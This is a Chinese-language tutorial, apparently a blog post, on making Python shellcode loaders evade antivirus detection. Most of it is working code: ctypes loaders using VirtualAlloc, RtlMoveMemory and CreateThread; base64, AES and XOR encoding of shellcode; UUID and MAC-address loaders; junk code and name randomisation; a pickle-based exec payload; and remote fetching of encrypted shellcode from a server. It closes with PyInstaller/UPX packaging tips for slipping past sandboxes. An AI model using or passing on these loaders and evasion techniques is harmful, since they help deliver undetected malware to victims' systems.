Python Shellcode免杀技术详解<\/h1>

一、Shellcode加载原理<\/h2>

Python加载shellcode的基本流程遵循以下三个步骤：<\/p>

申请可执行内存<\/strong>：使用VirtualAlloc函数分配具有可执行权限的内存区域<\/li>
写入Shellcode<\/strong>：将shellcode复制到分配的内存中<\/li>

执行内存<\/strong>：创建线程执行内存中的shellcode<\/li> <\/ol>
1.1 内存分配<\/h3>
使用Windows API函数VirtualAlloc<\/code>分配可执行内存：<\/p>
import<\/span> ctypes <\/span><\/span>rwxpage =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc( <\/span><\/span> ctypes.<\/span>c_int(0<\/span>), # 地址(0表示让系统选择)<\/span> <\/span><\/span> ctypes.<\/span>c_size_t(len(shellcode)), # 大小<\/span> <\/span><\/span> ctypes.<\/span>c_uint(0x3000<\/span>), # MEM_COMMIT | MEM_RESERVE<\/span> <\/span><\/span> ctypes.<\/span>c_uint(0x40<\/span>) # PAGE_EXECUTE_READWRITE<\/span> <\/span><\/span>) <\/span><\/span><\/code><\/pre>1.2 Shellcode复制<\/h3> 使用RtlMoveMemory<\/code>函数（相当于memcpy）复制shellcode：<\/p> ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlMoveMemory.<\/span>argtypes =<\/span> ( <\/span><\/span> ctypes.<\/span>c_void_p, # Destination<\/span> <\/span><\/span> ctypes.<\/span>c_void_p, # Source<\/span> <\/span><\/span> ctypes.<\/span>c_size_t # Length<\/span> <\/span><\/span>) <\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlMoveMemory.<\/span>restype =<\/span> None<\/span> <\/span><\/span> <\/span><\/span>buffer =<\/span> ctypes.<\/span>create_string_buffer(shellcode) <\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlMoveMemory( <\/span><\/span> ctypes.<\/span>c_void_p(rwxpage), <\/span><\/span> buffer, <\/span><\/span> ctypes.<\/span>c_size_t(len(shellcode)) <\/span><\/span>) <\/span><\/span><\/code><\/pre>1.3 执行Shellcode<\/h3> 使用CreateThread<\/code>创建线程执行shellcode：<\/p> handle =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread( <\/span><\/span> None<\/span>, # lpThreadAttributes<\/span> <\/span><\/span> 0<\/span>, # dwStackSize<\/span> <\/span><\/span> ctypes.<\/span>c_void_p(rwxpage), # lpStartAddress<\/span> <\/span><\/span> None<\/span>, # lpParameter<\/span> <\/span><\/span> 0<\/span>, # dwCreationFlags<\/span> <\/span><\/span> ctypes.<\/span>byref(ctypes.<\/span>c_ulong()) # lpThreadId<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span># 等待线程结束<\/span> <\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>WaitForSingleObject(handle, -<\/span>1<\/span>) <\/span><\/span><\/code><\/pre>二、Shellcode免杀技术<\/h2> 免杀主要从两个方面入手：<\/p> 对shellcode本身进行处理（加密\/编码\/混淆）<\/li> 对加载器代码进行处理（混淆\/变换）<\/li> <\/ol> 2.1 Shellcode加密技术<\/h3> 2.1.1 Base64编码<\/h4> import<\/span> ctypes <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>s =<\/span> b<\/span>'...'<\/span> # base64编码的shellcode<\/span> <\/span><\/span>shellcode =<\/span> base64.<\/span>b64decode(s) <\/span><\/span> <\/span><\/span>rwxpage =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc(0<\/span>, len(shellcode), 0x1000<\/span>, 0x40<\/span>) <\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlMoveMemory(rwxpage, ctypes.<\/span>create_string_buffer(shellcode), len(shellcode)) <\/span><\/span>handle =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread(0<\/span>, 0<\/span>, rwxpage, 0<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>WaitForSingleObject(handle, -<\/span>1<\/span>) <\/span><\/span><\/code><\/pre>2.1.2 AES加密<\/h4> 加密部分：<\/p> from<\/span> base64 import<\/span> b64encode <\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad <\/span><\/span>from<\/span> Crypto.Random import<\/span> get_random_bytes <\/span><\/span> <\/span><\/span>shellcode =<\/span> b<\/span>"..."<\/span> <\/span><\/span>key =<\/span> get_random_bytes(16<\/span>) <\/span><\/span>cipher =<\/span> AES.<\/span>new(key, AES.<\/span>MODE_CBC) <\/span><\/span>ct_bytes =<\/span> cipher.<\/span>encrypt(pad(shellcode, AES.<\/span>block_size)) <\/span><\/span>iv =<\/span> b64encode(cipher.<\/span>iv).<\/span>decode('utf-8'<\/span>) <\/span><\/span>ct =<\/span> b64encode(ct_bytes).<\/span>decode('utf-8'<\/span>) <\/span><\/span><\/code><\/pre>解密部分：<\/p> import<\/span> ctypes <\/span><\/span>from<\/span> base64 import<\/span> b64decode <\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> unpad <\/span><\/span> <\/span><\/span>iv =<\/span> 'xxx'<\/span> <\/span><\/span>key =<\/span> b<\/span>'xxx'<\/span> <\/span><\/span>ase_shellcode =<\/span> 'xxx'<\/span> <\/span><\/span> <\/span><\/span>iv =<\/span> b64decode(iv) <\/span><\/span>ase_shellcode =<\/span> b64decode(ase_shellcode) <\/span><\/span>cipher =<\/span> AES.<\/span>new(key, AES.<\/span>MODE_CBC, iv) <\/span><\/span>shellcode =<\/span> bytearray(unpad(cipher.<\/span>decrypt(ase_shellcode), AES.<\/span>block_size)) <\/span><\/span> <\/span><\/span># 加载shellcode...<\/span> <\/span><\/span><\/code><\/pre>2.1.3 多重编码+异或加密<\/h4> 加密脚本：<\/p> import<\/span> string <\/span><\/span>import<\/span> base64 <\/span><\/span>import<\/span> random <\/span><\/span>from<\/span> sys import<\/span> version_info <\/span><\/span> <\/span><\/span>def<\/span> encrypt<\/span>(buf, key): <\/span><\/span> """shellcode混淆加密"""<\/span> <\/span><\/span> shellcode1 =<\/span> base64.<\/span>b32encode(buf) # base32编码<\/span> <\/span><\/span> shellcode2 =<\/span> base64.<\/span>b16encode(shellcode1) # base16编码<\/span> <\/span><\/span> <\/span><\/span> if<\/span> version_info >=<\/span> (3<\/span>, 0<\/span>): <\/span><\/span> shellcode3 =<\/span> shellcode2.<\/span>hex() # python3<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> shellcode3 =<\/span> shellcode2.<\/span>encode('hex'<\/span>) # python2<\/span> <\/span><\/span> <\/span><\/span> # 异或加密<\/span> <\/span><\/span> random.<\/span>seed(key) <\/span><\/span> shellcode =<\/span> ''<\/span> <\/span><\/span> for<\/span> i in<\/span> shellcode3: <\/span><\/span> shellcode =<\/span> shellcode +<\/span> str(ord(i) ^<\/span> random.<\/span>randint(0<\/span>, 255<\/span>)) +<\/span> "."<\/span> <\/span><\/span> return<\/span> shellcode.<\/span>rstrip('.'<\/span>) <\/span><\/span><\/code><\/pre>解密脚本：<\/p> def<\/span> decrypt<\/span>(code, key): <\/span><\/span> # 异或解密<\/span> <\/span><\/span> random.<\/span>seed(key) <\/span><\/span> xor_code =<\/span> code.<\/span>split('.'<\/span>) <\/span><\/span> res_code =<\/span> ''<\/span> <\/span><\/span> for<\/span> i in<\/span> xor_code: <\/span><\/span> res_code =<\/span> res_code +<\/span> chr(int(i) ^<\/span> random.<\/span>randint(0<\/span>, 255<\/span>)) <\/span><\/span> <\/span><\/span> # 三重解码<\/span> <\/span><\/span> if<\/span> version_info >=<\/span> (3<\/span>, 0<\/span>): <\/span><\/span> shellcode =<\/span> bytes.<\/span>fromhex(res_code) <\/span><\/span> else<\/span>: <\/span><\/span> shellcode =<\/span> res_code.<\/span>decode('hex'<\/span>) <\/span><\/span> <\/span><\/span> shellcode =<\/span> base64.<\/span>b16decode(shellcode) <\/span><\/span> shellcode =<\/span> base64.<\/span>b32decode(shellcode) <\/span><\/span> return<\/span> shellcode <\/span><\/span><\/code><\/pre>2.2 加载器免杀技术<\/h3> 2.2.1 UUID加载<\/h4> 将shellcode转换为UUID格式：<\/p> import<\/span> uuid <\/span><\/span> <\/span><\/span>buf =<\/span> b<\/span>"<\/span>\xfc\x48\x83\xe4\xf0\xe8\xc8\x00<\/span>..."<\/span> <\/span><\/span>if<\/span> len(buf) %<\/span> 16<\/span> !=<\/span> 0<\/span>: <\/span><\/span> replenish_byte =<\/span> b<\/span>"<\/span>\x00<\/span>"<\/span> *<\/span> (16<\/span> -<\/span> len(buf) %<\/span> 16<\/span>) <\/span><\/span> buf =<\/span> buf +<\/span> replenish_byte <\/span><\/span> <\/span><\/span>shellcode =<\/span> [] <\/span><\/span>for<\/span> i in<\/span> range(len(buf) \/\/<\/span> 16<\/span>): <\/span><\/span> bytes_a =<\/span> buf[i*<\/span>16<\/span>:16<\/span>+<\/span>i*<\/span>16<\/span>] <\/span><\/span> b =<\/span> uuid.<\/span>UUID(bytes_le=<\/span>bytes_a) <\/span><\/span> shellcode.<\/span>append(str(b)) <\/span><\/span><\/code><\/pre>加载执行：<\/p> import<\/span> ctypes <\/span><\/span> <\/span><\/span>shellcode =<\/span> ['e48348fc-e8f0-00c8-0000-415141505251'<\/span>, ...<\/span>] <\/span><\/span> <\/span><\/span>rwxpage =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc(0<\/span>, len(shellcode)*<\/span>16<\/span>, 0x1000<\/span>, 0x40<\/span>) <\/span><\/span>rwxpage1 =<\/span> rwxpage <\/span><\/span>for<\/span> i in<\/span> shellcode: <\/span><\/span> ctypes.<\/span>windll.<\/span>Rpcrt4.<\/span>UuidFromStringA(i, rwxpage1) <\/span><\/span> rwxpage1 +=<\/span> 16<\/span> <\/span><\/span> <\/span><\/span>handle =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread(0<\/span>, 0<\/span>, rwxpage, 0<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>WaitForSingleObject(handle, -<\/span>1<\/span>) <\/span><\/span><\/code><\/pre>2.2.2 MAC地址加载<\/h4> 将shellcode转换为MAC地址格式：<\/p> import<\/span> ctypes <\/span><\/span> <\/span><\/span>buf =<\/span> b<\/span>"<\/span>\xfc\x48\x83\xe4\xf0\xe8\xc8\x00<\/span>..."<\/span> <\/span><\/span>if<\/span> len(buf) %<\/span> 6<\/span> !=<\/span> 0<\/span>: <\/span><\/span> replenish_byte =<\/span> b<\/span>"<\/span>\x00<\/span>"<\/span> *<\/span> (6<\/span> -<\/span> len(buf) %<\/span> 6<\/span>) <\/span><\/span> buf =<\/span> buf +<\/span> replenish_byte <\/span><\/span> <\/span><\/span>macmem =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc(0<\/span>, len(buf)\/<\/span>6<\/span>*<\/span>17<\/span>, 0x1000<\/span>, 0x40<\/span>) <\/span><\/span>for<\/span> i in<\/span> range(len(buf)\/<\/span>6<\/span>): <\/span><\/span> bytes_a =<\/span> buf[i*<\/span>6<\/span>:6<\/span>+<\/span>i*<\/span>6<\/span>] <\/span><\/span> ctypes.<\/span>windll.<\/span>Ntdll.<\/span>RtlEthernetAddressToStringA(bytes_a, macmem +<\/span> i*<\/span>17<\/span>) <\/span><\/span> <\/span><\/span>mac =<\/span> [] <\/span><\/span>for<\/span> i in<\/span> range(len(buf)\/<\/span>6<\/span>): <\/span><\/span> d =<\/span> ctypes.<\/span>string_at(macmem +<\/span> i*<\/span>17<\/span>, 17<\/span>) <\/span><\/span> mac.<\/span>append(d) <\/span><\/span><\/code><\/pre>加载执行：<\/p> import<\/span> ctypes <\/span><\/span> <\/span><\/span>mac =<\/span> ['FC-48-83-E4-F0-E8'<\/span>, 'C8-00-00-00-41-51'<\/span>, ...<\/span>] <\/span><\/span> <\/span><\/span>ptr =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc(0<\/span>, len(mac)*<\/span>6<\/span>, 0x1000<\/span>, 0x40<\/span>) <\/span><\/span>rwxpage =<\/span> ptr <\/span><\/span>for<\/span> i in<\/span> range(len(mac)): <\/span><\/span> ctypes.<\/span>windll.<\/span>Ntdll.<\/span>RtlEthernetStringToAddressA(mac[i], mac[i], rwxpage) <\/span><\/span> rwxpage +=<\/span> 6<\/span> <\/span><\/span> <\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualProtect(ptr, len(mac)*<\/span>6<\/span>, 0x40<\/span>, ctypes.<\/span>byref(ctypes.<\/span>c_long(1<\/span>))) <\/span><\/span>handle =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread(0<\/span>, 0<\/span>, ptr, 0<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>WaitForSingleObject(handle, -<\/span>1<\/span>) <\/span><\/span><\/code><\/pre>2.2.3 代码混淆<\/h4> 变量名随机化：<\/strong><\/p> import<\/span> random <\/span><\/span>import<\/span> string <\/span><\/span> <\/span><\/span>class<\/span> AutoRandom<\/span>: <\/span><\/span> def<\/span> auto_random_str<\/span>(self, min_length=<\/span>8<\/span>, max_length=<\/span>15<\/span>): <\/span><\/span> length =<\/span> random.<\/span>randint(min_length, max_length) <\/span><\/span> return<\/span> ''<\/span>.<\/span>join(random.<\/span>choice(string.<\/span>ascii_letters) for<\/span> x in<\/span> range(length)) <\/span><\/span> <\/span><\/span>def<\/span> make_variable_random<\/span>(shellcodeloader): <\/span><\/span> shellcodeloader =<\/span> shellcodeloader.<\/span>replace("ctypes"<\/span>, AutoRandom.<\/span>auto_random_str()) <\/span><\/span> shellcodeloader =<\/span> shellcodeloader.<\/span>replace("shellcode"<\/span>, AutoRandom.<\/span>auto_random_str()) <\/span><\/span> shellcodeloader =<\/span> shellcodeloader.<\/span>replace("ptr"<\/span>, AutoRandom.<\/span>auto_random_str()) <\/span><\/span> return<\/span> shellcodeloader <\/span><\/span><\/code><\/pre>添加花指令：<\/strong><\/p> w_code1 =<\/span> """ <\/span><\/span><\/span>import random <\/span><\/span><\/span>def partition(test_arr, low, high): <\/span><\/span><\/span> i = (low - 1) <\/span><\/span><\/span> pivot = test_arr[high] <\/span><\/span><\/span> for j in range(low, high): <\/span><\/span><\/span> if test_arr[j] <= pivot: <\/span><\/span><\/span> i = i + 1 <\/span><\/span><\/span> test_arr[i], test_arr[j] = test_arr[j], test_arr[i] <\/span><\/span><\/span> test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1] <\/span><\/span><\/span> return i + 1 <\/span><\/span><\/span> <\/span><\/span><\/span>def quick_sort(test_arr, low, high): <\/span><\/span><\/span> if low < high: <\/span><\/span><\/span> pi = partition(test_arr, low, high) <\/span><\/span><\/span> quick_sort(test_arr, low, pi - 1) <\/span><\/span><\/span> quick_sort(test_arr, pi + 1, high) <\/span><\/span><\/span> <\/span><\/span><\/span>test_arr= [] <\/span><\/span><\/span>for i in range(59999): <\/span><\/span><\/span> test_arr.append(random.random()) <\/span><\/span><\/span>n= len(test_arr) <\/span><\/span><\/span>quick_sort(test_arr,0, n - 1) <\/span><\/span><\/span>"""<\/span> <\/span><\/span><\/code><\/pre>2.2.4 反序列化加载<\/h4> 序列化：<\/p> import<\/span> pickle <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>shellcodeloader =<\/span> """ <\/span><\/span><\/span>import ctypes,base64,time <\/span><\/span><\/span>shellcode = base64.b64decode(b'\/EiD5PDoyAAAAE....') <\/span><\/span><\/span>shellcode = bytearray(shellcode) <\/span><\/span><\/span>ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 <\/span><\/span><\/span>ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) <\/span><\/span><\/span>buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) <\/span><\/span><\/span>ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buffered, ctypes.c_int(len(shellcode))) <\/span><\/span><\/span>handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) <\/span><\/span><\/span>ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) <\/span><\/span><\/span>"""<\/span> <\/span><\/span> <\/span><\/span>class<\/span> AAA<\/span>(object): <\/span><\/span> def<\/span> __reduce__<\/span>(self): <\/span><\/span> return<\/span> (exec, (shellcodeloader,)) <\/span><\/span> <\/span><\/span>seri =<\/span> pickle.<\/span>dumps(AAA()) <\/span><\/span>seri_base64 =<\/span> base64.<\/span>b64encode(seri) <\/span><\/span>print(seri_base64) <\/span><\/span><\/code><\/pre>反序列化执行：<\/p> import<\/span> base64,<\/span> pickle <\/span><\/span>shellcodeloader =<\/span> b<\/span>'gASVwgcAAAAAAACMCGJ1aWx0aW5zlIwEZX...'<\/span> <\/span><\/span>pickle.<\/span>loads(base64.<\/span>b64decode(shellcodeloader)) <\/span><\/span><\/code><\/pre>2.3 远程加载技术<\/h3> 将加密后的shellcode和key保存在远程服务器上：<\/p> import<\/span> ctypes <\/span><\/span>import<\/span> base64 <\/span><\/span>import<\/span> random <\/span><\/span>from<\/span> sys import<\/span> version_info <\/span><\/span>from<\/span> urllib.request import<\/span> urlopen <\/span><\/span> <\/span><\/span>def<\/span> get_data<\/span>(url_shellcode, url_key): <\/span><\/span> """远程获取shellcode"""<\/span> <\/span><\/span> if<\/span> version_info >=<\/span> (3<\/span>, 0<\/span>): <\/span><\/span> from<\/span> urllib.request import<\/span> urlopen <\/span><\/span> else<\/span>: <\/span><\/span> from<\/span> urllib2 import<\/span> urlopen <\/span><\/span> <\/span><\/span> key =<\/span> urlopen(url_key).<\/span>read().<\/span>decode() <\/span><\/span> shellcode =<\/span> urlopen(url_shellcode).<\/span>read().<\/span>decode() <\/span><\/span> return<\/span> shellcode, key <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> url_shellcode =<\/span> "http:\/\/ip:8000\/shellcode.txt"<\/span> <\/span><\/span> url_key =<\/span> "http:\/\/ip:8000\/key.txt"<\/span> <\/span><\/span> <\/span><\/span> shellcode, key =<\/span> get_data(url_shellcode, url_key) <\/span><\/span> shellcode =<\/span> decrypt(shellcode, key) # 使用前面介绍的decrypt函数<\/span> <\/span><\/span> runcode(shellcode) # 使用前面介绍的runcode函数<\/span> <\/span><\/span><\/code><\/pre>三、打包与优化<\/h2> 3.1 使用PyInstaller打包<\/h3> 结合UPX压缩壳使用：<\/p> pyinstaller -F -w .\s<\/span>hellcode.py --upx-dir D:\u<\/span>px.exe --clean <\/span><\/span><\/code><\/pre>3.2 代码压缩<\/h3> 使用python-minifier缩小代码体积：<\/p> pip install python-minifier <\/span><\/span>pyminify .\b<\/span>ypass.py --output bypass-mini.py <\/span><\/span><\/code><\/pre>四、总结与建议<\/h2> Python加载shellcode的免杀方式多样，但生成的exe文件较大<\/li> 推荐结合多种技术使用，如加密+混淆+远程加载<\/li> 对于更高效的免杀，建议考虑使用C#或Go语言实现<\/li> 云沙箱通常会将py2exe\/pyinstaller生成的exe标记为可疑，需特别注意<\/li> <\/ol> 五、参考资源<\/h2> 先知社区原帖：python shellcode免杀的常用手法<\/li> PyObfuscate代码混淆工具：https:\/\/pyob.oxyry.com\/<\/li> UPX压缩工具：https:\/\/github.com\/upx\/upx<\/li> <\/ol>